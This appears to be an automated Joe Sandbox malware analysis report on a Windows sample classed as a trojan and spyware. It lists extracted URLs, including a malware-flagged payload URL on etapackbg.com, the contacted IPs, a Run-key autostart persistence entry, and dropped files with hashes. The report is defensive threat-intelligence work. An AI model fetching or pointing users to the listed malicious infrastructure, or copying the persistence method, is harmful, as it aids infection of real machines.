                                              https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%26CJfScEKhr.exe, 0000000E.00000002.518729407.0000000003A60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://contextual.media.net/checksync.phpd=6CJfScEKhr.exe, 0000000E.00000002.518729407.0000000003A60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://stackoverflow.com/q/11564914/23354;6CJfScEKhr.exe, 00000000.00000002.406971785.0000000003AB3000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 00000000.00000002.408946193.000000000BFE0000.00000004.08000000.00040000.00000000.sdmp, 6CJfScEKhr.exe, 00000000.00000002.406535494.0000000003991000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.518824108.00000000026A0000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.519864421.0000000003573000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.520995677.0000000005350000.00000004.08000000.00040000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.519431243.0000000003451000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.519896768.0000000003F31000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.519547093.0000000003182000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.520559090.0000000004053000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.525075431.000000000C620000.00000004.08000000.00040000.00000000.sdmpfalse
                                                    		high
                                                    https://stackoverflow.com/q/2152978/233546CJfScEKhr.exe, 00000000.00000002.406971785.0000000003AB3000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 00000000.00000002.408946193.000000000BFE0000.00000004.08000000.00040000.00000000.sdmp, 6CJfScEKhr.exe, 00000000.00000002.406535494.0000000003991000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.519864421.0000000003573000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.520995677.0000000005350000.00000004.08000000.00040000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.519431243.0000000003451000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.519896768.0000000003F31000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.520559090.0000000004053000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.525075431.000000000C620000.00000004.08000000.00040000.00000000.sdmpfalse
                                                      		high
                                                      http://etapackbg.com6CJfScEKhr.exe, 00000000.00000002.405677406.0000000002991000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.517033021.0000000002451000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.518078761.0000000002F31000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • 10%, Virustotal, Browse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      https://www.google.com/chrome/thank-you.html6CJfScEKhr.exe, 0000000E.00000002.518729407.0000000003A60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=l6CJfScEKhr.exe, 0000000E.00000002.518729407.0000000003A60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://contextual.media.net/checksync.php6CJfScEKhr.exe, 0000000E.00000002.518729407.0000000003A60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name6CJfScEKhr.exe, 00000000.00000002.405677406.0000000002991000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.517033021.0000000002451000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.518078761.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.google.com/chrome/Fs4c6CJfScEKhr.exe, 0000000E.00000002.518729407.0000000003A60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://contextual.media.net/checksync.php:http://www.msn.com/de-ch/Zhttps://contextual.media.net/me6CJfScEKhr.exe, 0000000E.00000002.518729407.0000000003A60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://etapackbg.com/css/Sngggz.png;Apwjojdzaicrizygsmmd.Zpaxmptx6CJfScEKhr.exe, 00000000.00000002.405045976.00000000004F2000.00000002.00000001.01000000.00000003.sdmp, 6CJfScEKhr.exe, 0000000E.00000000.402557351.0000000000852000.00000002.00000001.01000000.00000003.sdmp, Pthmzffh.exe, 0000000F.00000000.418097555.0000000000172000.00000002.00000001.01000000.00000009.sdmp, Pthmzffh.exe, 00000015.00000002.513670996.0000000000C62000.00000002.00000001.01000000.00000009.sdmptrue
                                                                  • Avira URL Cloud: malware
                                                                  		unknown
                                                                  https://login.microsoftonline.com/common/oauth2/authorize6CJfScEKhr.exe, 0000000E.00000002.518729407.0000000003A60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high

                                                                    World Map of Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public IPs

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    80.66.64.174
                                                                    		clamprite.gaRussian Federation
                                                                    		202723VAD-SRL-AS1MDfalse
                                                                    104.21.89.250
                                                                    		etapackbg.comUnited States
                                                                    		13335CLOUDFLARENETUSfalse

                                                                    Private

                                                                    IP
                                                                    192.168.2.1

                                                                    General Information

                                                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                                                    Analysis ID:579169
                                                                    Start date:26.02.2022
                                                                    Start time:10:17:34
                                                                    Joe Sandbox Product:CloudBasic
                                                                    Overall analysis duration:0h 14m 2s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Sample file name:6CJfScEKhr (renamed file extension from none to exe)
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                    Number of analysed new started processes analysed:28
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • HDC enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@19/56@4/3
                                                                    EGA Information:
                                                                    • Successful, ratio: 50%
                                                                    HDC Information:
                                                                    • Successful, ratio: 11.8% (good quality ratio 11.6%)
                                                                    • Quality average: 80.4%
                                                                    • Quality standard deviation: 27.4%
                                                                    HCA Information:
                                                                    • Successful, ratio: 98%
                                                                    • Number of executed functions: 671
                                                                    • Number of non-executed functions: 52
                                                                    Cookbook Comments:
                                                                    • Adjust boot time
                                                                    • Enable AMSI

                                                                    Warnings

                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                    • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                                    • Execution Graph export aborted for target Pthmzffh.exe, PID 4564 because it is empty
                                                                    • Execution Graph export aborted for target Pthmzffh.exe, PID 5004 because it is empty
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    TimeTypeDescription
                                                                    10:19:46AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Pthmzffh "C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exe"
                                                                    10:19:48API Interceptor1x Sleep call for process: 6CJfScEKhr.exe modified
                                                                    10:19:54AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Pthmzffh "C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exe"

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    No context

                                                                    Domains

                                                                    No context

                                                                    ASNs

                                                                    No context

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\6CJfScEKhr.exe.log

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:modified
                                                                    Size (bytes):936
                                                                    Entropy (8bit):5.362425814220162
                                                                    Encrypted:false
                                                                    SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7r1qE4j:MxHKXwYHKhQnoPtHoxHhAHKzvr1qHj
                                                                    MD5:AC79CED5A2CDA485B5FCA7365DDFC804
                                                                    SHA1:B089977F0BE53E56517AAC414F3DC0B5D2AFE198
                                                                    SHA-256:A5144269866791DA4939ABCC6C5A97B898655D21807B2F0B5CAA177439FAB481
                                                                    SHA-512:300C0BAE54247E706D2B139B1AC0E670D361A6DA6748E12A16E00462A571958A34B9E185B633C6F2AFD089861F0278223AB3E80B6222D893AD1B61C19AE111CE
                                                                    Malicious:true
                                                                    Reputation:unknown
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                                    C:\Users\user\AppData\Local\Temp\451031561661558511835342.tmp

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.792852251086831
                                                                    Encrypted:false
                                                                    SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                    MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                    SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                    SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                    SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\451043595565637469786195.tmp

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.698304057893793
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
                                                                    MD5:3806E8153A55C1A2DA0B09461A9C882A
                                                                    SHA1:BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
                                                                    SHA-256:366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
                                                                    SHA-512:31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\45104515600561951377635.tmp

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                    Category:dropped
                                                                    Size (bytes):73728
                                                                    Entropy (8bit):1.1874185457069584
                                                                    Encrypted:false
                                                                    SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                    MD5:72A43D390E478BA9664F03951692D109
                                                                    SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                    SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                    SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\451050624007655820418571.tmp

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                    Category:dropped
                                                                    Size (bytes):73728
                                                                    Entropy (8bit):1.1874185457069584
                                                                    Encrypted:false
                                                                    SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                    MD5:72A43D390E478BA9664F03951692D109
                                                                    SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                    SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                    SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\451060158565755957799361.tmp

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                    Category:dropped
                                                                    Size (bytes):118784
                                                                    Entropy (8bit):0.4507667042986948
                                                                    Encrypted:false
                                                                    SSDEEP:96:V/WU+bDoYysX0uhnydVjN9DLjGQLBE3u:V/l+bDo3irhnydVj3XBBE3u
                                                                    MD5:8D1E4EF2C47505BE17244F97D8591000
                                                                    SHA1:09EC63BD44834AC76F888D87C0A358532665D8B6
                                                                    SHA-256:A395EB3FFB419984F33F2AC9EE04A6257730A4600580812A5518957F50BB6D88
                                                                    SHA-512:B7EB3FE94FF62DD8D6BFEF55C0D79ABB2DAC65E30757E016B37CF78F29C27BDE89D0798CD21357B438EE4007D917AD830A11521DA3DC5C1988D73CBD9990FCD1
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-console-l1-1-0.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):18744
                                                                    Entropy (8bit):7.080160932980843
                                                                    Encrypted:false
                                                                    SSDEEP:192:3jBMWIghWGZiKedXe123Ouo+Uggs/nGfe4pBjS/uBmWh0txKdmVWQ4GWDZoiyqnP:GWPhWVXYi00GftpBjSemTltcwpS
                                                                    MD5:502263C56F931DF8440D7FD2FA7B7C00
                                                                    SHA1:523A3D7C3F4491E67FC710575D8E23314DB2C1A2
                                                                    SHA-256:94A5DF1227818EDBFD0D5091C6A48F86B4117C38550343F780C604EEE1CD6231
                                                                    SHA-512:633EFAB26CDED9C3A5E144B81CBBD3B6ADF265134C37D88CFD5F49BB18C345B2FC3A08BA4BBC917B6F64013E275239026829BA08962E94115E94204A47B80221
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Reputation:unknown
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....."............!......................... ...............................0.......J....@.............................+............ ..................8=..............T............................................................................text...+........................... ..`.rsrc........ ......................@..@......".........;...T...T.........".........d.................".....................RSDSMB...5.G.8.'.d.....api-ms-win-core-console-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......+....edata... ..`....rsrc$01....` .......rsrc$02......................".....................(...`...............,...W...................G...o...............................D...s...............5...b...............................................api-ms-win-core-console-l1-1-0.dll.AllocConsole.kern

                                                                    C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-datetime-l1-1-0.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):18232
                                                                    Entropy (8bit):7.093995452106596
                                                                    Encrypted:false
                                                                    SSDEEP:192:RWIghWG4U9xluZo123Ouo+Uggs/nGfe4pBjSbMDPxVWh0txKdmVWQ4CWrDry6qnZ:RWPhWFv0i00GftpBjBHem6plUG+zIw
                                                                    MD5:CB978304B79EF53962408C611DFB20F5
                                                                    SHA1:ECA42F7754FB0017E86D50D507674981F80BC0B9
                                                                    SHA-256:90FAE0E7C3644A6754833C42B0AC39B6F23859F9A7CF4B6C8624820F59B9DAD3
                                                                    SHA-512:369798CD3F37FBAE311B6299DA67D19707D8F770CF46A8D12D5A6C1F25F85FC959AC5B5926BC68112FA9EB62B402E8B495B9E44F44F8949D7D648EA7C572CF8C
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Reputation:unknown
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...A..............!......................... ...............................0.......#....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....A...........<...T...T.......A...........d...............A.......................RSDS...W,X.l..o....4....api-ms-win-core-datetime-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02....................A.......P...............(...8...H...................t.......................api-ms-win-core-datetime-l1-1-0.dll.GetDateFormatA.kernel32.GetDateFormatA.GetDateFormatW.kernel32.GetDateFormatW.GetTimeFormatA.kernel32.GetTimeFormatA

                                                                    C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-debug-l1-1-0.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):18232
                                                                    Entropy (8bit):7.1028816880814265
                                                                    Encrypted:false
                                                                    SSDEEP:384:cWPhWM4Ri00GftpBj2YILemtclD16PaEC:l10oiBQe/L
                                                                    MD5:88FF191FD8648099592ED28EE6C442A5
                                                                    SHA1:6A4F818B53606A5602C609EC343974C2103BC9CC
                                                                    SHA-256:C310CC91464C9431AB0902A561AF947FA5C973925FF70482D3DE017ED3F73B7D
                                                                    SHA-512:942AE86550D4A4886DAC909898621DAB18512C20F3D694A8AD444220AEAD76FA88C481DF39F93C7074DBBC31C3B4DAF97099CFED86C2A0AAA4B63190A4B307FD
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Reputation:unknown
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......GF....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@................9...T...T...................d.......................................RSDS.j..v..C...B..h....api-ms-win-core-debug-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................P...............(...8...H...|...............q.......................api-ms-win-core-debug-l1-1-0.dll.DebugBreak.kernel32.DebugBreak.IsDebuggerPresent.kernel32.IsDebuggerPresent.OutputDebugStringA.kernel32.OutputDebugStri

                                                                    C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-errorhandling-l1-1-0.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):18232
                                                                    Entropy (8bit):7.126358371711227
                                                                    Encrypted:false
                                                                    SSDEEP:192:NFmxD3PWIghWGJY/luZo123Ouo+Uggs/nGfe4pBjSffcp8Wh0txKdmVWQ4yWRzOr:NFkWPhW60i00GftpBj4emHlD16Pa7v
                                                                    MD5:6D778E83F74A4C7FE4C077DC279F6867
                                                                    SHA1:F5D9CF848F79A57F690DA9841C209B4837C2E6C3
                                                                    SHA-256:A97DCCA76CDB12E985DFF71040815F28508C655AB2B073512E386DD63F4DA325
                                                                    SHA-512:02EF01583A265532D3970B7D520728AA9B68F2B7C309EE66BD2B38BAF473EF662C9D7A223ACF2DA722587429DA6E4FBC0496253BA5C41E214BEA240CE824E8A2
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Reputation:unknown
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...\x.............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....\x..........A...T...T.......\x..........d...............\x......................RSDS.1....U45.z.d.....api-ms-win-core-errorhandling-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............\x......n...............(...D...`...................4...f.......................'...J.....................api-ms-win-core-errorhandling-l1-1-0.dll.GetErrorMode.kernel32.GetErrorMode.GetLastError.kernel32.GetLastError.RaiseExcept

                                                                    C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-file-l1-1-0.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):21816
                                                                    Entropy (8bit):7.014255619395433
                                                                    Encrypted:false
                                                                    SSDEEP:384:d6PvVXHWPhWnsnhi00GftpBjaJemyDlD16PamW8:UPvVX85nhoisJeLt8
                                                                    MD5:94AE25C7A5497CA0BE6882A00644CA64
                                                                    SHA1:F7AC28BBC47E46485025A51EEB6C304B70CEE215
                                                                    SHA-256:7EA06B7050F9EA2BCC12AF34374BDF1173646D4E5EBF66AD690B37F4DF5F3D4E
                                                                    SHA-512:83E570B79111706742D0684FC16207AE87A78FA7FFEF58B40AA50A6B9A2C2F77FE023AF732EF577FB7CD2666E33FFAF0E427F41CA04075D83E0F6A52A177C2B0
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Reputation:unknown
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!.........................0...............................@......./....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@...............8...T...T..................d......................................RSDS.0...B..8....G....api-ms-win-core-file-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................K...K.......D...p...6...`.......................?...l...............A...................6..._...................;...e............... ...I...n...............-...d...................*...g...............*...U...................M...

                                                                    C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-file-l1-2-0.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):18232
                                                                    Entropy (8bit):7.112057846012794
                                                                    Encrypted:false
                                                                    SSDEEP:192:IWIghWGJnWdsNtL/123Ouo+Uggs/nGfe4pBjSfcD63QXWh0txKdmVWQ4yW1rwqnh:IWPhWlsnhi00GftpBjnem9lD16PamFP
                                                                    MD5:E2F648AE40D234A3892E1455B4DBBE05
                                                                    SHA1:D9D750E828B629CFB7B402A3442947545D8D781B
                                                                    SHA-256:C8C499B012D0D63B7AFC8B4CA42D6D996B2FCF2E8B5F94CACFBEC9E6F33E8A03
                                                                    SHA-512:18D4E7A804813D9376427E12DAA444167129277E5FF30502A0FA29A96884BF902B43A5F0E6841EA1582981971843A4F7F928F8AECAC693904AB20CA40EE4E954
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Reputation:unknown
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...._.L...........!......................... ...............................0............@.............................L............ ..................8=..............T............................................................................text...<........................... ..`.rsrc........ ......................@..@....._.L........8...T...T........_.L........d................_.L....................RSDS........g"Y........api-ms-win-core-file-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg.......L....edata... ..`....rsrc$01....` .......rsrc$02........._.L....@...................(...8...l...............`.......................api-ms-win-core-file-l1-2-0.dll.CreateFile2.kernel32.CreateFile2.GetTempPathW.kernel32.GetTempPathW.GetVolumeNameForVolumeMountPointW.kernel32.GetVolumeNameForVolumeMou

                                                                    C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-file-l2-1-0.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):18232
                                                                    Entropy (8bit):7.166618249693435
                                                                    Encrypted:false
                                                                    SSDEEP:192:BZwWIghWG4U9ydsNtL/123Ouo+Uggs/nGfe4pBjSbUGHvNWh0txKdmVWQ4CWVU9h:UWPhWFBsnhi00GftpBjKvxemPlP55QQ7
                                                                    MD5:E479444BDD4AE4577FD32314A68F5D28
                                                                    SHA1:77EDF9509A252E886D4DA388BF9C9294D95498EB
                                                                    SHA-256:C85DC081B1964B77D289AAC43CC64746E7B141D036F248A731601EB98F827719
                                                                    SHA-512:2AFAB302FE0F7476A4254714575D77B584CD2DC5330B9B25B852CD71267CDA365D280F9AA8D544D4687DC388A2614A51C0418864C41AD389E1E847D81C3AB744
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Reputation:unknown
